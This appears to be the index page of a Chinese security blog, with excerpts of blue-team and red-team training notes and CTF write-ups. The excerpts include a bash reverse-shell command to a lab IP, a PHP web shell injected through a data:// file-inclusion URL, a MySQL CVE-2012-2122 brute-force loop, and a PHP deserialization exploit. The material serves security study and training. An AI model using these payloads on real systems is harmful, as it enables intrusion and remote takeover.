蓝队培训---day1
流量分析Ethernet II:看源/目标mac地址Internet Protocol Version 4:源/目的ipTransmission Control Protocol: 看源/目的端口、flag位(判断哪些端口开放:syn+ack是开放,rst是未开放) 过滤语法和实践源ip为。。。。。1ip.src== 目的ip为。。。。1ip.dst== 源/目的地址为。。。。1ip.addr== 看端口是否开放(过滤出回应syn+ack的包)1tcp.flags == 0x0012 比如找靶机开了什么端口观察分析都是攻击通过65127端口来扫描(因为靶机都是回应65127端口)那就加上 1tcp.dstport==65127 过滤请求方式比如过滤POST 1http.request.method==POST 模糊匹配路径关键字匹配http类型中带有admin@123 1http contains "admin@123" 比如匹配请求中带有upload的 1http.request.uri contains...
红队培训---day4
redis一键利用工具工具下完要去RedisModulesSDK/文件夹make一下(vpn分配的是虚拟网卡的ip) 反弹shell先本地写个shell 1bash -c "bash -i >& /dev/tcp/192.168.198.48/404 0>&1" 然后本地开一个http服务让redis下载本地shell监听,反弹shell 练习http://10.3.4.96:10011/ (爆破) http://10.3.4.96:10012 (文件包含)直接data协议写shell了 1http://10.3.4.96:10012/?demo=data://text/plain,<?=eval($_POST[1]);?> 然后post传参 11=system('tac fl4gisisish3r3.php'); http://10.3.4.96:10013/...
红队培训---day3
数据库漏洞利用mysqlcve-2012-2122使用mysql命令(随机密码)连接数据库 1mysql -uroot -pwrong -h 10.3.4.87 -P3306 连接失败写一个for循环,利用cve-2012-2122漏洞,最后可以连接进入mysql数据库中win: 1for /l %i in (1,1,1000) do mysql -uroot -pwrong -h 10.3.4.87 -P3306 linux: 1for i in `seq 1 1000`;do mysql -h 10.3.4.87 -uroot -proot -P3306;done 循环一段时间后即可成功(离谱,破到一半靶机断联了) 进一步利用(判断能否读写文件)判定mysql可读可写目录 1show variables like "%secure_file_priv%"; 12341.值为空代表任意读写2.有路径,代表特定路径可读写3.NULL为不可读写 写文件写文件不要直接写马,会被直接杀,建议先写探针,这样可以验证是否被解析 1select...
红队培训---day2
sql注入基础查询语句介绍mysql免密登录(前提是拿到root权限)mysql 的配置文件它位于/etc/my.cnf或是/etc/mysql/my.cnf在其中添加(比如ubuntu是/etc/mysql/my.cnf) 12[mysqld]skip-grant-tables 然后重启服务 手注首先要先判断字段数(order by到报错,比如4报错,说明只有3个字段)、然后查库名、表名、字段名information_schema数据库schemata:information_schema数据库中存放数据库信息的表tables:information_schema数据库中存放所有数据库中表的信息的表(这个表的利用一般是查TABLE_SCHEMA、TABLE_NAME)columns:information_schema数据库中记录所有数据库中所有表中的字段信息的表(这个表的利用一般是查TABLE_SCHEMA、TABLE_NAME、COLUMN_NAME) 常用查询语句获取所有的库名的查询语句为: 1select schema_name from...
红队培训---day1
信息收集这方面知识跟以前学的大差不差 google...
[THM]Jr Penetration Tester Certificate
磨洋工磨了这么久终于是全打完了
白嫖gemini
中午吃饭水群看到消息了蛮操作下真嫖到了,代理用美国节点就行还有2T的google one
唉,2023
...
MoeCTF 2023 部分write up
签到题hello CTFer给了个url,直接打开就有flag 然后提交就完了 WEBhttp下载一个叫WSRX的客户端连接一下开环境以后给的地址 然后访问localhost:64824 然后就是完成这些任务,1、2有手就行 5就是将ua头的值换成MoeBrowser就行 3是将cookie中的character的值改为admin就行 4是在数据包添加一个字段 1X-Forwarded-For: 127.0.0.1 然后所有任务完成,flag就出了 web入门指北题目显示要解码得flag 先把附件下载下来看看,解压完是个pdf文档 文档最后发现了一组神秘数字,要解码的应该就是这个了 一眼十六进制,那就转字符一下,写个脚本 1234567891011original_hex_string = "66 6c 61 67 3d 62 57 39 6c 59 33 52 6d 65 33 63 7a 62 45 4e 76 62 57 56 66 56 47 39 66 62 57 39 6c 51 31 52 47 58 31 63 79 59 6c...
第六届浙江省网络与信息安全竞赛 初赛 部分wp
前言初赛名次14,太爽了,被带飞了属于是,web都是做到最后几步出不来丢给大爹🤣🤣🤣 解题情况 解题过程Web1.ezphpPHP反序列化,var_dump触发BBB,通过BBB中的param1触发CCC,通过CCC中的$this->func->aaa()触发AAA执行任意代码 exp如下 1234567891011121314151617181920212223242526272829303132333435363738394041424344<?phphighlight_file(___FILE___); class AAA{ public $cmd; public function __call($name, $arguments){ eval($this->cmd); return "done"; } }class BBB{ public $param1; public function...







![[记录]尝试shiro有key无链利用,但失败](/img/c1/3.webp)